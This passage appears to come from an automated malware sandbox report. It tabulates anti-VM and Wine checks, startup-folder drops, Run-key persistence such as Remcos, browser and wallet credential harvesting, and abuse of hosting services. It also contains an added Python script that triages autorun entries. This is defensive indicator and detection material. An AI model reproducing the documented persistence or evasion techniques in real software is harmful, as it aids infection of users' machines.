| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3020718451.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2568621829.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\seksiak.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\seksiak.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\seksiak.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\pornhub_downloader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\PORNHU~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\svchost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\Desktop\Files\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\Desktop\Files\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\New Text Document mod.exse\\a\\networkmanager.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\afasdfga = "C:\\Users\\Admin\\AppData\\Roaming\\afasdfga.exe" | C:\Users\Admin\Desktop\Files\Mswgoudnv.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" | C:\Users\Admin\Desktop\Files\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe | N/A |
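The Run/RunOnce table above mixes payload persistence with packaging noise. The `wextract_cleanupN` RunOnce values are written by the IExpress self-extractor (wextract) that several of the droppers are wrapped in: at the next logon, `rundll32 advpack.dll,DelNodeRunDLL32` deletes the `IXP00N.TMP` staging folder, so those entries are an unpacker artefact rather than the payload's persistence. The entries worth chasing are the ones whose image lives in a user-writable location (`C:\ProgramData\Remcos\remcos.exe`, `C:\Users\Admin\AppData\Roaming\boleto.exe`), borrows a system binary's name (`svchost` pointing at `C:\ProgramData\svchost`), or lands in the Windows root rather than System32 (`C:\Windows\sysnldcvmr.exe`). The script below is an added example, not part of this report or of any tool named on it: it parses rows in the report's own pipe-delimited layout, decodes the C-style quoting the sandbox applies to registry values, collapses repeated writes of the same value, and assigns a verdict using those three heuristics. The sample rows are a subset copied from the table above; the verdict labels and the list of system-binary names are the example's own choices.

```python
import re

# Constructed sample: a subset of the "Adds Run key to start application" rows
# from this report, copied in the report's own pipe-delimited layout.
SAMPLE_ROWS = r'''
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" | C:\Users\Admin\Desktop\Files\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" | C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe | N/A |
'''

# Heuristics chosen for this example (assumptions, not a standard list).
USER_WRITABLE = re.compile(r'^(?:C:\\Users\\|C:\\ProgramData\\)', re.I)
SYSTEM_BINARY_NAMES = {'svchost', 'svchost.exe', 'explorer.exe', 'lsass.exe',
                       'csrss.exe', 'winlogon.exe'}
OS_ROOTS = ('c:\\windows\\system32\\', 'c:\\windows\\syswow64\\')


def _unescape(s):
    """Undo the report's C-style quoting: strip the outer quotes, then turn
    every backslash-escaped character into the character itself."""
    if len(s) >= 2 and s[0] == '"' and s[-1] == '"':
        s = s[1:-1]
    out, i = [], 0
    while i < len(s):
        if s[i] == '\\' and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return ''.join(out)


def _image_path(command):
    """Pull the launched image out of a Run value: a quoted path, else the text
    up to the first .exe, else the first token (e.g. rundll32.exe ...)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = re.match(r'(.+?\.exe)(?:\s|$)', command, re.I)
    return m.group(1) if m else command.split(' ', 1)[0]


def _verdict(name, command, image):
    low = image.lower()
    base = low.rsplit('\\', 1)[-1]
    # IExpress/wextract deleting its own IXP*.TMP staging folder at next logon.
    if name.lower().startswith('wextract_cleanup') and \
            'advpack.dll,delnoderundll32' in command.lower():
        return 'benign-unpacker-cleanup'
    if base in SYSTEM_BINARY_NAMES and not low.startswith(OS_ROOTS):
        return 'masquerade-system-name'
    if USER_WRITABLE.match(image):
        return 'user-writable-image'
    if re.match(r'^c:\\windows\\[^\\]+\.exe$', low):
        return 'dropped-into-windows-root'
    return 'review'


def triage_autoruns(report_text):
    """Parse 'Set value' rows in the report's table layout and return one entry
    per (key, value name): decoded command, launched image, write count, the
    processes that wrote it, and a verdict."""
    entries = {}
    for line in report_text.splitlines():
        parts = [p.strip() for p in line.split('|')]
        if len(parts) < 5 or not parts[1].startswith('Set value'):
            continue
        indicator, writer = parts[2], parts[3]
        key_and_name, _, raw_value = indicator.partition(' = ')
        key, _, name = key_and_name.rpartition('\\')
        command = _unescape(raw_value)
        entry = entries.setdefault((key, name), {
            'key': key, 'name': name, 'command': command,
            'image': _image_path(command), 'count': 0, 'writers': set(),
        })
        entry['count'] += 1
        entry['writers'].add(writer.rsplit('\\', 1)[-1])
    for e in entries.values():
        e['verdict'] = _verdict(e['name'], e['command'], e['image'])
    return list(entries.values())


if __name__ == '__main__':
    for e in triage_autoruns(SAMPLE_ROWS):
        print(f"{e['verdict']:26} {e['name']:18} -> {e['image']}  "
              f"(x{e['count']}, by {', '.join(sorted(e['writers']))})")
```

Running it against the full table gives one line per autorun, so the two `Remcos` values (HKLM WOW6432Node and HKCU) and the three `Graph` writes collapse to a handful of entries, with the `wextract_cleanup` rows labelled as unpacker cleanup instead of persistence.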
Checks installed software on the system
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
